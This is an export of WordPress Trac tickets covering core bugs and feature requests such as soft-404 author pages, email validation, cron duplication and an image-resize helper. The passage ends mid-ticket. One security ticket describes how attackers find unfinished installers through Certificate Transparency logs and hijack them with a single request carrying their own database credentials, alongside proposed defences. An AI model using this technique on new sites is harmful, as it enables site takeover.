normal Awaiting Review defect (bug) new dev-feedback 2022-02-10T23:34:17Z 2022-09-27T14:11:42Z "Erase Personal Data work fine with invalid username but not working with email. When i added random text email auto inserted. " ravipatel Future Releases 44848 Ensure that empty author profiles have proper 404 behaviour Query normal normal Awaiting Review defect (bug) new dev-feedback 2018-08-27T14:33:38Z 2019-09-17T19:09:53Z "** Summary ** - WordPress 'creates' a ''profile posts archive'' (i.e., ""See all posts by [author name]"") for each user in the system. This can be reached by clicking 'view' from the Users table in wp-admin. - It does so, ''even if they have no posts'' - and even if they lack the permission to publish posts entirely. - Whilst the empty profile pages ''look'' like they serve a standard 404 error, in fact, they return a 200 HTTP header status, and just call the 404 template part for the main page body. - This results in many 'soft 404' pages/errors, which can adversley impact the way in search engines and other systems (Facebook, Twitter, etc) crawl, extract information from, and value/evaluate websites (see Google's documentation on soft 404s at https://support.google.com/webmasters/answer/181708?hl=en). It's important that we correct this behaviour in WordPress Core for numerous reasons; from compliance with basic web standards (error pages should return an appropriate HTTP header status), to adherence with the guidelines and preferences of external platforms (search engines, social networks, etc), to consistency with other page/template handling processes. ** Example ** A newly created `subscriber` user on a test site (called 'Test User 2') with no authored posts has an author archive accessible at https://yoast.jonoalderson.com/author/test-user-2/. Although this presents as a 404 error, the page returns meta data and behaviour consistent with a valid author request (see the tags contained in the `<head>` of the HTML source; particularly the `<meta>` tags). The body template then just calls the 404 template part. ** Solution ** We should ensure that these scenarios return proper/consistent 404 behaviour. Specifically, requests to author profiles where the author has zero posts should trigger normal 404 behaviour (including headers, query behaviour, etc), as opposed to just calling the 404 template. E.g., {{{ // If author archive has zero posts global $wp_query; $wp_query->set_404(); status_header(404); include( get_query_template( '404' ) ); die(); }}} As opposed to just: {{{ // If author archive has zero posts include( get_query_template( '404' ) ); die(); }}} " jonoaldersonwp Future Releases 40736 Ensure that `get_blog_count()` and `get_user_count()` return an integer Networks and Sites normal normal Future Release defect (bug) new dev-feedback 2017-05-11T18:59:30Z 2021-06-07T09:57:58Z "The documentation for the functions `get_blog_count()` and `get_user_count()` states that the return type is an integer, however the functions only call `get_network_option()` without any typecast. The functions should be adjusted to actually reflect their documentation. While this might theoretically be problematic in terms of backward-compatibility, in #40724 some initial thoughts of this being a viable change were expressed, so let's think about it on this ticket." flixos90 Future Releases 17916 Enqueued styles are only printed on login_footer in wp-login.php Script Loader 3.2 normal normal Future Release defect (bug) reopened dev-feedback 2011-06-28T00:29:48Z 2018-08-10T19:29:53Z "In my plugin I have this include: wp_register_style(""cimy_uef_register"", $cuef_css_webpath.""/cimy_uef_register.css"", false, false); now independently where and when I use the above css, even if I never enqueue or print it... it basically forces the admin panel to be always left instead of the right. In particular it changes the admin panel menu #adminmenu to stick to the left, also other little things. The question is: why this happens even if the CSS is not included at all? Browsing the documentation quickly on that function I didn't find anything useful, please help me." Cimmo Future Releases 58512 Enhancing Security and User Experience: Addressing Password Length Limitations and Improving Validation Process Posts, Post Types 6.2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-06-12T11:08:25Z 2023-07-14T11:31:15Z "When I attempted to use a password consisting of 256 characters and tried to publish my post, I encountered an error message stating, ""Updating failed. Could not update post in the database."" It appears that this issue may affect all users. Therefore, I kindly request that you consider addressing this problem by either fixing it or implementing validation on the input field to prevent such errors in the future. I used below password for password protect post : 123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345 **Total Characters: 255** Could you please verify the attached video URL, https://www.awesomescreenshot.com/video/18248088?key=dd7a62697a5b66aaf5d332dec3a0a9b9" utsav72640 Future Releases 51039 Enhancement: Show a prompt in dashboard to recruit more translators I18N normal normal Awaiting Review enhancement new dev-feedback 2020-08-17T07:15:11Z 2023-08-18T05:09:24Z "Problem: Out of 204 available locales teams, around 130 are behind by more than one major version in releasing their core language pack, and considered to be “inactive.” The common issue among them is that they don't have enough contributors to suggest and approve translations. Also, once the team becomes inactive, it's very hard to find and onboard new contributors. In the [https://make.wordpress.org/polyglots/handbook/plugin-theme-authors-guide/#generating-community-contributions Polyglots Team handbook], we suggest plugin authors who are looking for translators of their product to show a dismissible message in the dashboard. How about core also adopts that method for core? * Only show suggestions to users whose browser language is not English AND it matches one of the inactive locales ([https://make.wordpress.org/polyglots/teams/#major-behind-many behind by more than one major version] or no language pack is ever created). * Link to a polyglots handbook page where the new contributor can get more info (I suggest [https://make.wordpress.org/polyglots/handbook/translating/first-steps/ First Steps] page for now) The message could look like this: **Translate WordPress to LOCALE_NAME:** It looks like you understand LOCALE_NAME. Did you know you can help translate WordPress in your language? [https://make.wordpress.org/polyglots/handbook/translating/first-steps/ Visit this page] to get started. After some time, polyglots global mentors can check and promote new contributors based on our [https://make.wordpress.org/polyglots/handbook/translating/expectations/translation-editor-locale-manager-vetting-criteria/ GTE/Locale Manager] vetting criteria and provide mentorship to help them stay active. " Nao Future Releases 47616 Enhancement: doing_shortcode() function similar to doing_filter() audrasjb* Shortcodes normal normal Future Release enhancement accepted needs-unit-tests 2019-06-27T12:42:53Z 2021-11-09T08:46:59Z "Currently there is no way to determine whether the current code is run from a shortcode callback. Similar to actions and filters it would be nice to have a `doing_shortcode()` function. My idea is to have an optional parameter for the shortcode tag. If the parameter is passed it will check if that exact shortcode is running. If no parameter is passed it will return true if any shortcode is running. Though I believe it's not officially supported, if shortcodes are triggered within shortcodes it would be best to keep an array of current shortcodes and only remove an active shortcode tag if the callback is finished." keraweb Future Releases 38204 enhancement: custom pathname to wp-config.php Bootstrap/Load 4.7 normal normal Awaiting Review enhancement new dev-feedback 2016-10-01T15:01:18Z 2022-10-20T18:18:29Z "This patch allows for setting the pathname to the {{{wp-config.php}}} file with a {{{WP_CONFIG_FILE}}} environment variable. The end goal is to have wordpress code separate (and possibly read-only) from the config file, and from the state (user content). " gdamjan Future Releases 60622 Enhancement: add filter to function get_home_path() return value Administration 6.4.3 normal normal Awaiting Review enhancement new dev-feedback 2024-02-23T11:14:41Z 2024-03-14T16:25:51Z "Allowing to filter the return value of wp-admin/includes/file.php:get_home_path() would help to handle cases when WordPress is used as an headless Rest API backend and wp_options home points to a different domain than siteurl. In such a case, get_home_path fails to get the absolute filesystem path of the root of the WordPress installation. Being able to filter the output of get_home_path() would allow developers to avoid breaking its functionality on headless setup. Why is important: in a headless setup, having wp_options home set to the frontend domain allow WordPress to generate user-facing urls with the correct domain. " alexrah Future Releases 36655 Enhancement: Add datetime column to options table. Options, Meta APIs normal normal enhancement new needs-unit-tests 2016-04-24T15:04:51Z 2019-06-04T20:57:35Z "== Proposal == The options table in WordPress is a great key/value storage option for a wide variety of different data used by core and plugins. One improvement that would increase its utility for faster time based queries on data stored there is to add a DATETIME column. == Some examples where this benefit could be realized: == === Example 1: Transient storage. === Currently, when there is no object-cache in use, transients are stored to the wp_options table. However, for each transient there are two records. One for the actual key/value pair and then one for any timestamp set as the transient expiry. Having a datetime column would allow the transient to always only consist of one record and thus make any queries interacting with transients much simpler. === Example 2: Arbitrary plugin data using the options table for its own scheduled tasks. === A lot of plugins are using the transient system wrong because it's not intended for indicating minimum age. Having a datetime column would provide the database schema in WordPress core that allows for plugins to implement their own ""minimum/maximum age"" apis. === Example 3: Tracking creation/modification times. === Having a datetime column would allow for indicating when a key/value pair was created and/or modified which could be useful for plugins that have need to do so. === Example 4: Scheduled settings/options. === Having a datetime column could allow for scheduled changes with a sites configuration and thus more advanced previews/site preparation, (think adding scheduled changes to site title, or site description via the customizer). Having a datetime column makes such schedules simpler to implement. == Implementation == === Schema === {{{ option_date datetime NOT NULL default '0000-00-00 00:00:00' }}} === Iterations: === 1. Add the column and modify options api to expose the new column to queries (get_option, update_option, site option functions etc). 2. Convert transient API to implement new option_date column for setting expiries when object-cache is not in use. == Who and When == I'd be willing to spearhead putting some patches together and getting the initial code going but before I invest some time in this I'm just testing the waters to see if this is even something that would be considered/welcomed for core. I'm not aware of any potential conflicts this may pose with the purpose for the option table but if there are any I'm sure I'll find out! I definitely don't see this as going in 4.6 but it might have potential for 4.7 if work begins fairly soon. " nerrad Future Releases 56141 Enhance installer security Security high major Future Release enhancement new dev-feedback 2022-07-05T08:37:14Z 2023-12-31T11:23:02Z "== Summary The WP installer needs to implement security features to prevent unauthorized use. If the attacker finds an unfinished installer, he can finish the installation on behalf of the user and make malicious changes. It was hard to find these unfinished installers in the past, but from 2018 Google Chrome requires all publicly trusted web certificates to be logged in Certificate Transparency Log. It is possible to parse CT log in realtime and target newly created websites. Usually, the SSL certificate is issued when a new hosting is set up. So, you can learn about most of the newly created websites from the CT log. The CT log is huge and reliable parsing should be challenging, but the methods are improving, and this attack is becoming more common. With current methods, **it can take less than a minute** for an attacker to learn of and compromise a new site. The attacker needs **only one HTTP request to compromise the site** - send valid DB credentials to /wp-admin/setup-config.php?step=2. In this case, the WP installer creates wp-config.php with these DB credentials. The user can then install WP into an external database controlled by the attacker without noticing. I analyzed a big-scale ongoing attack of this type and got access to the attacker database to further investigation. He can compromise hundreds of sites a day. I made an automated system to notify administrators of compromised sites. During three days, I sent more than 600 notifications and published the details on https://smitka.me/2022/07/01/wordpress-installer-attack-race/. Another installer issue, #52544, makes the installer publicly available too, but the possibility of exploitation is rather accidental and more noticeable. == Recommendations I see two ways how to add additional protection without significant process changes and without bothering the user too much: 1) allow only particular DB hosts 2) add an installation key feature For the first one, I made a PoC mu-plugin which controls allowed DB hosts via environment variables or configuration file. https://gist.github.com/lynt-smitka/425e4e97c61cac172e229ffc9ad090e4 Localhost + 127.0.0.1 is allowed by default, so there is no change for many users. A web host can use the env variable to define their DB servers, so the process will be smooth if they use external DB. If the user wants to use any other server, he has an option to define them via constant in the wp-dbhosts.php file (it is not possible to use wp-config because it doesn't exist). For the second one, you need to modify the installation workflow slightly. I made a modified setup-config.php as PoC: https://gist.github.com/lynt-smitka/45608ddeb8df19b0820201d066d4b42c It combines the first method - if the DB host is localhost or any server allowed by an environment variable, there is no change for users. If you want to use any other DB host, you have to fill ""install key"". The ""install key"" is generated into the install-key.php file, and the user can read it via FTP (the same way he uploaded the core files). Demo how it works: https://www.youtube.com/watch?v=A7-Sbbb-cZM " smitka Future Releases 36666 Enhance `remove_theme_support()` so that it can take additional arguments Themes 3.0 normal normal Awaiting Review enhancement new dev-feedback 2016-04-25T18:21:45Z 2018-05-15T17:08:21Z "Sometimes we might need to use the function `remove_theme_support()` to only support specific details of a specific theme feature, in particular it would be useful to be able to remove support for specific post formats or remove post thumbnail support for specific post types (related to #22080 for example). These checks would need to happen in a `switch` statement, similar to the other theme support functions, and we would need to handle additional arguments. For example, it should be possible to do `remove_theme_support( 'post-formats', 'video' )` to remove support for the video post format." flixos90 Future Releases 9825 Enforce permalink history, outright Permalinks 2.8 normal normal enhancement assigned needs-unit-tests 2009-05-15T01:06:37Z 2019-06-04T20:40:43Z "currently, we enforce old slugs and www pref (not even sure that works, since I ended up fixing it in a plugin). canonical doesn't work for pages, or hardly. we should enforce permalink history, outright. store it in a a db field, and query against it to optimize url2post()." Denis-de-Bernardy Future Releases 56709 Encountered a problem that no one has ever met Please help me Formatting normal normal Awaiting Review defect (bug) new dev-feedback 2022-10-01T11:21:46Z 2023-08-08T16:11:55Z "As usual, I used the element to update the page. After clicking the update button, I clicked the update button for a few more times, and this problem occurred. The contents of my page were all gone, leaving only one line of errors, (`Warning: count(): Parameter must be an array or an object that implements Countable in/www/wwwroot/www.xxxx.com/wp-includes/formatting.php on line 3415`)And the same is true for publishing new pages. Please help me, thank you! I used to update the page several times every month. It used to be normal, but the problem didn't appear until today " qq2094629698 Future Releases 44283 Enclosure can't deal with CDN media files - WPCore redirects the URL Feeds 4.9.6 normal normal Awaiting Review defect (bug) new dev-feedback 2018-05-31T15:36:55Z 2021-06-07T09:58:21Z "When using WP as audio collection, RSS2 is needed to get podcasts spread around f.i. to iTunes ect.\\ \\ To validate the feed right from WP 4.9.6 at http://www.feedvalidator.org from source https://ferrie.audio/cat/podcasts/feed/ we recieve several errors where the most important one is the **redirection** of CDN URL's to WP URL\\ \\ **example:** **cdn.**ferrie.audio/blablabla/Can-You-hear-Me.m4a - the CDN.(= AWS3) location of the file\\ **becomes:** ferrie.audio/blablabla/Can-You-hear-Me.m4a\\ \\ **without** the CDN. urlprefix there is no audio stream - all streams are at CDN.\\ adding the CDN. urlprefix enclosure by hand and then save the blogpost results is 2 enclosures - 1 with CDN. - 1 without\\ adding the enclosure but NOT save the blogpost shows the correct enclosure - but - the RSS output shows the URL **without** the CDN. urlprefix\\ \\ have been looking into the /wp-includes/feed.php - but there is for me no place to find where this redirection takes place - an feed expert might be able to correct this problem - sorry that i can't - i'm no coder i make music." researcher Future Releases 58389 Enable auto-updates for plugins installed from the Plugins Add New Screen Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2023-05-23T18:27:30Z 2023-08-23T18:49:42Z "To increase and promote auto-updates usage, we could start by enabling auto-updates by default for plugins installed from the Plugins Add New Screen, with an opt-out switch under the Activate button. A “Disable auto-updates” link could appear under the Install Now button. To make it more prominent, we could make it bold or red. There are many scenarios where this logic would help the ecosystem, for example, when a user gets their WordPress site developed by a professional and then takes complete control of it, installing plugins without enabling auto-updates. If this suggestion is too bold, we could first detect if most of the installed plugins have auto-updates enabled and calculate if this is the best logical configuration for the site before enabling auto-updates by default. For already installed plugins with auto-updates disabled, the link could read “Enable auto-updates”. This could promote auto-updates for those plugins as well. Eventually, if this works well, we could expand the same logic for themes." JosVelasco Future Releases 40953 Empty values are handled inconsistently between wpdb->get_results() and wpdb->get_col() Database 0.71 normal normal Awaiting Review defect (bug) new dev-feedback 2017-06-08T17:18:39Z 2017-06-08T17:51:19Z "As outlined and discussed yesterday in Slack [https://wordpress.slack.com/archives/C02RQBWTW/p1496821047585923 here], [https://wordpress.slack.com/archives/C02RQBWTW/p1496844209230845 here], and [https://wordpress.slack.com/archives/C02RQBWTW/p1496850305693715 here], `wpdb` treats empty stored values differently in the `get_results()` and `get_col()` methods. This is because of the use of `get_var()` inside of `get_col()`, which defaults to null for empty values. For example, let's say you're running a query like `SELECT rate FROM sometable` through `get_results()`. With the default parameters and empty values for the column, you'd get something like the following: {{{ array(2) { [0]=> object(stdClass)#1734 (1) { [""rate""]=> string(0) """" } [1]=> object(stdClass)#1735 (1) { [""rate""]=> string(0) """" } } }}} If you ran that same query through `get_col()`, you'd instead get an array of `null` values: {{{ array(4) { [0]=> NULL [1]=> NULL } }}} This seems oddly inconsistent. And writing tests for the workaround is annoying in that creates the need to understand the core workaround in the future. Now, this code goes all the way back to [112], so changing the default behavior is not even on the table. Some solutions brainstormed with @boonebgorges and @johnjamesjacoby include: * A global flag to check against, i.e. `wpdb_get_col_force_strings( true );` * A global flag in the form of a constant * A settable `wpdb`-level flag * A new argument for `get_col()` to selectively change the behavior. The global flag ideas are attractive because they cover the entire DB stack: whether you're using the abstraction layers like `get_posts()`, `WP_Query`, or any of the other query classes, it ''just works'' all the way down the line. The settable `wpdb` flag is attractive only if you're really working with direct queries like we are in our custom table query classes. The same goes for a new argument in `get_col()`, though both could be implemented higher up the stack in the form of arguments or filters. I think a good first step here would be to try to benchmark performance for all of the listed options, just to see what we're looking at. The global flag choices seem like they could be the least impactful. In the short term, our workaround for AffiliateWP will probably be to create a wrapper for `get_results()` that simply plucks the values out so we can maintain consistency, but I'm not a big fan of writing and maintaining core workarounds in perpetuity. Whichever way we go in core, this is something that we should probably address. Who knows how many workarounds there are currently in the wild to fix this." DrewAPicture Future Releases 44940 Empty confirm_key property in WP_User_Request when hooking in the user_request_action_email_content Privacy 4.9.6 normal normal Awaiting Review defect (bug) new dev-feedback 2018-09-13T14:42:39Z 2020-10-16T22:44:17Z "I need to change the look (and the url) of the link for the request personal data deletion/export, so I hooked to `user_request_action_email_content` filter, and inspected the `$email_data` so that I can get the request `ID` and the `confirm_key` in my email. But upon inspecting the data provided I can see the confirmation key in the `confirm_url` key of the `$email_data`, but the field in the object is empty. This is intentional or a bug? {{{#!php Array ( [request] => WP_User_Request Object ( [ID] => 334 [user_id] => 20 [email] => my.email.[at]example.com [action_name] => export_personal_data [status] => request-pending [created_timestamp] => 1536847994 [modified_timestamp] => 1536847994 [confirmed_timestamp] => 0 [completed_timestamp] => 0 [request_data] => Array ( ) [confirm_key] => ) [email] => my.email.[at]example.com [description] => Export Personal Data [confirm_url] => https://my-site.com/wp-login.php?action=confirmaction&request_id=334&confirm_key=wjjeDD3mx5J02U51F7Zt [sitename] => My Cool site [siteurl] => https://my-site.com/ ) }}} " dingo_d Future Releases 56440 Embed blocks in widget areas caching in many posts Embeds 6.0.1 normal normal Awaiting Review defect (bug) new dev-feedback 2022-08-25T16:01:32Z 2022-09-06T17:04:13Z "When I am using blocks for my widget areas I can include an oEmbed easily enough. For example, I might include a video in a sidebar or footer widget area using the embed Gutenberg block. This is great! Then I notice that ''every single post'' that a user visits which displays that widget area as part of its templates will get duplicated post_meta entries caching the embed. This quickly pollutes the post_meta table with hundreds of duplicate entries for the same embed on different posts. These ""_oembed_xxx"" and ""_oembed_time_xxx"" entries all have the same identifier for the ""xxx"" since they all come from the same embed in the widget area. Shouldn't these entries be associated with the widget area instead of the post? In fact, why are these oembed cache values stored in post_meta at all? Isn't this the kind of thing that deserves more universal storage in case the same embed is used on more than one page in any circumstance? " eceleste Future Releases 48951 email_too_short is not good email validation candidate Mail 5.4 low trivial Awaiting Review feature request new dev-feedback 2019-12-12T14:23:07Z 2020-08-09T18:18:07Z "Currently, both `is_email` and `sanitize_email` will invalidate/sanitize valid emails: {{{#!php 'admin@mailserver1' 'm@m' }}} Both are valid emails. ICANN just discourages using them. The problem comes when you work with decoupled WordPress, and the front end is using custom validation that allows such emails, but WordPress doesn't so you don't have consistent behavior. Plus this is just wrong, as the official specification allows such mails. https://en.wikipedia.org/wiki/Email_address#Valid_email_addresses " dingo_d Future Releases 46229 Email Direction Mail normal normal Future Release defect (bug) new dev-feedback 2019-02-10T21:53:27Z 2019-04-01T21:06:26Z "Hello WordPress, Thank you so much for changing the world. I am using the RTL layout of WordPress and all emails that I receive from WordPress, like changing password, reviewing a comment are in LTR direction. Hope you fix this in the next update or let me know that how can I fix it. Regards, Rahim" rahimvaziri Future Releases 21537 Email address sanitisation mangles valid email addresses Formatting 3.4.1 normal normal defect (bug) new dev-feedback 2012-08-10T11:24:50Z 2022-10-23T14:32:55Z "If you change your email address to one including an ampersand then we mangle the address with html entities. For example: * This - peter&paul@sitting.in.a.tree.com * Becomes - peter&paul@sitting.in.a.tree.com This is due to the call to {{{wp_filter_kses}}} on {{{pre_user_email'}}} in {{{default-filters.php}}}. The was added in [5906] for #4546. I'm not sure if we need kses filtering for emails - if we do which should probably revert this conversion of the & => & afterwards." westi Future Releases 45000 "Eliminating ""Add New"" Button Beside Titles in Admin" Administration 4.9.8 normal normal Awaiting Review enhancement new dev-feedback 2018-09-26T21:20:53Z 2020-01-06T17:45:29Z "This is apart of a bigger project for my staff and I, you can find the context here https://www.theportlandcompany.com/2017/09/10/proposed-improvements-to-the-wordpress-ui/. Our goal is to clean up the UI, especially to reduce scrolling on mobile, with three principles in mind: - Context Visibility - Only show something when it's in context. - Add With Purpose - If something, such as padding or margins, don't serve a purpose, don't add them. - Simplify Number of Actions - If a step can be avoided in a process, avoid it. We propose eliminating the Add New button that appears beside Titles when on various admin pages because: - There is already a button in the admin menu on the left. - The position of the button changes depending on the length of the title, disorienting users. - On mobile, especially, it makes the page look broken as a result of the above mentioned issue. - Feedback from dozens of clients we've trained concur - for some reason - that they are confused by multiple ""Add New"" links/buttons. Maybe this is subjective - we're not confused by it and feel multiple access points is helpful, but only when it's in a sensible and easy to accessible place. We think maybe because ""Add New"" is appearing next to the page title they don't understand it's creating a new Post, but rather something related to whatever they titled that page." s3w47m88 Future Releases 30177 Eliminate deprecated pointers Administration normal normal enhancement new dev-feedback 2014-10-29T17:19:33Z 2019-06-04T19:26:56Z "While working on #30158 @nacin suggested that we eliminate the now irrelevant pointers (anything before 3.9). Initially I followed the existing convention: blanking, but leaving, the internal pointer method. @nacin also mentioned that we should eventually removing those blanked methods and that they were only left behind because we hadn't considered the full ramifications of straight removing them. I spent a few brain cycles on exactly that these past several hours and below are my findings. **Option The First:** We can completely remove these methods with no negative impact whatsoever. Reason: The pointer class is Final and cannot be extended (so there are no inheritance concerns) and these static methods themselves are completely useless in isolation. There is no reasonable explanation for a person ever calling these methods directly, and calling remove_action() on them does not depend on their existence, either. **Option The Second:** We remove the methods and register a new `get_deprecated_pointers()` method to be used in tandem with a `__callStatic()` magic method in order to inform the fringiest fringe-case developer that they've done something abhorrently wrong (in the most polite way possible). My vote is for Option 1 because I can't fathom a world in which someone would have a productive reason to statically call one of these pointer methods in isolation. Option 2 gives us a new list to maintain fairly unnecessarily and succeeds in adding more lines of code than it removes. I've provided patches for each option so all that is left is for someone else to weigh in with their opinions. @jjj likes option 2 @aaroncampbell likes option 1" rzen Future Releases 57826 Either core themes should not be automatically installed OR their presence should not be a site health issue Site Health normal minor Awaiting Review enhancement new dev-feedback 2023-02-28T21:12:33Z 2023-03-01T20:28:34Z WordPress automatically installs new core themes over time. The inactive presence of these core themes is then detected as a site health issue. One or the other of these things should not be true. zergling81 Future Releases 50290 Edit Post and Edit Page is not showing in Admin Bar, When I open any Post or Page in new tab while in Customize Customize normal normal Awaiting Review enhancement new dev-feedback 2020-05-31T16:49:51Z 2021-06-01T03:06:11Z "In Customize, When I try to open any post or any page with the '''open link in new tab ''' or '''open lin in new window''', Edit Post or Edit Page is not showing in Admin Bar. But when I try to open any Category or Tag with the open link in a new tab or new window, it showing Edit Category and Edit Tag in Admin Bar. I have attached a gif file and screenshots for a better understanding." dhruvpandya Future Releases 60064 Edit no-js CSS in bundled themes Bundled Theme normal minor Awaiting Review enhancement new dev-feedback 2023-12-13T21:56:39Z 2024-02-15T06:38:38Z "The CSS directive in `style.css` of the Twenty Fifteen theme `.no-js .main-navigation ul ul` should be altered to this `html.no-js .main-navigation ul ul` As other plugins like buddypress add their own `no-js` classes to the `body` which can cause conflicts. I have raised this with them directly: #buddypress9033 This could be widened into a broader ticket on a standard way of adding `no-js` classes that themes or plugins could follow as right now some add it to the `html` and some to the `body` class" shawfactor Future Releases 48488 Easier disabling of PDF thumbnail creation Media 4.7 normal normal Future Release feature request new dev-feedback 2019-11-03T20:14:48Z 2019-12-03T16:49:09Z "Since #31050 wordpress automatically creates thumbnails for uploaded PDF Files by creating a second attachment post object with the extracted image. While this may be useful for many use cases, in some like ours it is not. Furthermore, it is possible to turn of thumbnail creation for audio and video by using the following simple code ( {{{#!php <?php remove_post_type_support( 'attachment:audio', 'thumbnail' ); remove_post_type_support( 'attachment:video', 'thumbnail' ); }}} ). It would be great to have a similar concept for pdf thumbnails in wp-admin/includes/image.php" pampfelimetten Future Releases 15311 dynamic image resize (on the fly) using already available functions Media 3.1 normal normal Future Release enhancement new dev-feedback 2010-11-03T20:18:44Z 2020-03-12T15:30:08Z "The lack of a dynamic resize function in WordPress forces theme developers to register lots of image sizes for their themes to use. One of the problems with this approach is that the server becomes full of image files that will be never used. Another problem is that when someone changes their theme the image sizes simply doesn't match, forcing people to use a plugin to regenerate all image files, and once again lots of those files will never be used. So theme developers right now are using some sort of image resizing script like timthumb that works outside of wp. I think it has many drawbacks comparing to a native implementation. So I made a function that uses WordPress native image handling capabilities to resize and save those resized images for future use. I use this for attached images as well as standalone files such as custom fields and other images. What I want here is just to share my solution, and maybe we can someday put something like this into core (actually something better then this): {{{ /* * Resize images dynamically using wp built in functions * Victor Teixeira * * php 5.2+ * * Exemple use: * * <?php * $thumb = get_post_thumbnail_id(); * $image = vt_resize( $thumb,'' , 140, 110, true ); * ?> * <img src=""<?php echo $image[url]; ?>"" width=""<?php echo $image[width]; ?>"" height=""<?php echo $image[height]; ?>"" /> * * @param int $attach_id * @param string $img_url * @param int $width * @param int $height * @param bool $crop * @return array */ function vt_resize( $attach_id = null, $img_url = null, $width, $height, $crop = false ) { // this is an attachment, so we have the ID if ( $attach_id ) { $image_src = wp_get_attachment_image_src( $attach_id, 'full' ); $file_path = get_attached_file( $attach_id ); // this is not an attachment, let's use the image url } else if ( $img_url ) { $file_path = parse_url( $img_url ); $file_path = ltrim( $file_path['path'], '/' ); //$file_path = rtrim( ABSPATH, '/' ).$file_path['path']; $orig_size = getimagesize( $file_path ); $image_src[0] = $img_url; $image_src[1] = $orig_size[0]; $image_src[2] = $orig_size[1]; } $file_info = pathinfo( $file_path ); $extension = '.'. $file_info['extension']; // the image path without the extension $no_ext_path = $file_info['dirname'].'/'.$file_info['filename']; $cropped_img_path = $no_ext_path.'-'.$width.'x'.$height.$extension; // checking if the file size is larger than the target size // if it is smaller or the same size, stop right here and return if ( $image_src[1] > $width || $image_src[2] > $height ) { // the file is larger, check if the resized version already exists (for crop = true but will also work for crop = false if the sizes match) if ( file_exists( $cropped_img_path ) ) { $cropped_img_url = str_replace( basename( $image_src[0] ), basename( $cropped_img_path ), $image_src[0] ); $vt_image = array ( 'url' => $cropped_img_url, 'width' => $width, 'height' => $height ); return $vt_image; } // crop = false if ( $crop == false ) { // calculate the size proportionaly $proportional_size = wp_constrain_dimensions( $image_src[1], $image_src[2], $width, $height ); $resized_img_path = $no_ext_path.'-'.$proportional_size[0].'x'.$proportional_size[1].$extension; // checking if the file already exists if ( file_exists( $resized_img_path ) ) { $resized_img_url = str_replace( basename( $image_src[0] ), basename( $resized_img_path ), $image_src[0] ); $vt_image = array ( 'url' => $resized_img_url, 'width' => $new_img_size[0], 'height' => $new_img_size[1] ); return $vt_image; } } // no cached files - let's finally resize it $new_img_path = image_resize( $file_path, $width, $height, $crop ); $new_img_size = getimagesize( $new_img_path ); $new_img = str_replace( basename( $image_src[0] ), basename( $new_img_path ), $image_src[0] ); // resized output $vt_image = array ( 'url' => $new_img, 'width' => $new_img_size[0], 'height' => $new_img_size[1] ); return $vt_image; } // default output - without resizing $vt_image = array ( 'url' => $image_src[0], 'width' => $image_src[1], 'height' => $image_src[2] ); return $vt_image; } }}} " vteixeira Future Releases 46969 During customize theme - preview body/icons get cuts on left side Customize 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2019-04-18T07:45:12Z 2021-05-30T19:53:46Z "Hello, While we customize the theme from admin dashboard (Dashboard > Appearance > Customize), the preview body gets cut from the left side resulting the icons to be not displayed properly in iPod landscape and portrait mode. " shashank3105 Future Releases 59442 Duplicate query in WP_Query Query 6.2 normal normal 6.6 defect (bug) assigned changes-requested 2023-09-25T11:32:47Z 2024-03-13T15:27:55Z "When a site using a classic theme and has sticky posts, that can result in duplicate query. ( See attached screenshot ). This is because post_type variable passed the sticky sub query, is empty string on the first run. See the [https://github.com/WordPress/wordpress-develop/blob/de9e06a4c021295af3ac11fdd08ea29a57529668/src/wp-includes/class-wp-query.php#L3493 line]. This results in different cache query key being generating, resulting in duplicate queries. Steps to replicate. 1. Set theme to 2016. 2. Import theme data test data. 3. Go to home page. 4. Open query monitor, see duplicate query. " spacedmonkey Future Releases 59138 Duotone filter selector does not apply when using Image block alignment Editor 6.3 normal normal Future Release defect (bug) new close 2023-08-18T10:52:33Z 2024-02-20T05:50:28Z "Steps to reproduce the issue :- 1. Activate Twenty Seventeen theme. 2. Choose Image block. 3. Use Alignment 4. Give Highlight or shadow to the block. You can able to see it is working fine in editor side but having issue in front side when alignment is applied. I have attached video for better understanding. Video URL :- https://share.cleanshot.com/tDbCt0h3fTLVMMhbK4xt" nidhidhandhukiya Future Releases 11800 doubled execution of cron jobs westi Cron API 2.9.1 normal normal Future Release defect (bug) new dev-feedback 2010-01-07T11:17:53Z 2021-04-04T10:34:28Z "Hi, as I've already mentioned in ticket #11505 , cron-jobs occasionally get executed twice (e.g. daily backup arrives two times). I've changed the code according to the patch attachment:ticket:11505:ticket-11505-stop-gap.patch (which derives from [http://wpengineer.com/ping-problem/]) after my comment:ticket:11505:49 and had no doubles within this time period. This week I've upgraded to WP 2.9.1 and since then backups arrive two, sometimes three times, again. Looking at the changes from 2.9 to 2.9.1, I have no other explanation for this behavior. - Maybe we should consider having a closer look again on this patch attachment:ticket:11505:ticket-11505-stop-gap.patch . Greetz, Berny" neoxx Future Releases 27076 double newlines inserted before captions Editor 2.6 normal normal defect (bug) new dev-feedback 2014-02-09T13:35:31Z 2019-06-04T19:25:02Z "Steps to reproduce: - Upload some picture in the library and add some caption to it - Edit a post/page using the visual editor and, after some text, insert the picture using the add media button, so a ""caption"" shorttag is created - Go into text editing - Suppress the two newlines that appeared before the ""caption"" shorttag - Go into visual mode - Go into text mode: the newlines reappeared It is important to put something before the picture inserted in order to reproduce the bug, because the two newlines are not inserted if it is at the very beginning of a post/page. This is annoying for example in a table with top-aligned cells, if in a cell you have some text, and in the cell just to the right you have a ""caption"", then the two won't be aligned, since the newlines are converted to an empty paragraph during the rendering. From what I saw, the issue could be fixed by just removing the line n° 124 in wp-admin/js/editor.js: {{{content = content.replace( /\s*\[caption([^\[]+)\[\/caption\]\s*/gi, '\n\n[caption$1[/caption]\n\n' );}}}" arupqfjm Future Releases 55456 Double escaping wp_user-settings Users 2.7 normal normal Future Release defect (bug) new dev-feedback 2022-03-24T09:27:13Z 2022-05-02T10:41:08Z "Fresh install of WordPress with no plugins and using default Twenty Twenty Two theme. Either directly insert test data; {{{ INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (1, 'wp_user-settings', 'foo=1&bar=1'); }}} Or activate this plugin; {{{ <?php /* Plugin Name: Ampersand Test */ register_activation_hook( __FILE__, function(){ set_user_setting( 'foo', 1 ); set_user_setting( 'bar', 1 ); } ); }}} The name of the attributes and their values are completely arbitrary and have no impact on the behaviour. Now go to your ""Profile"" page 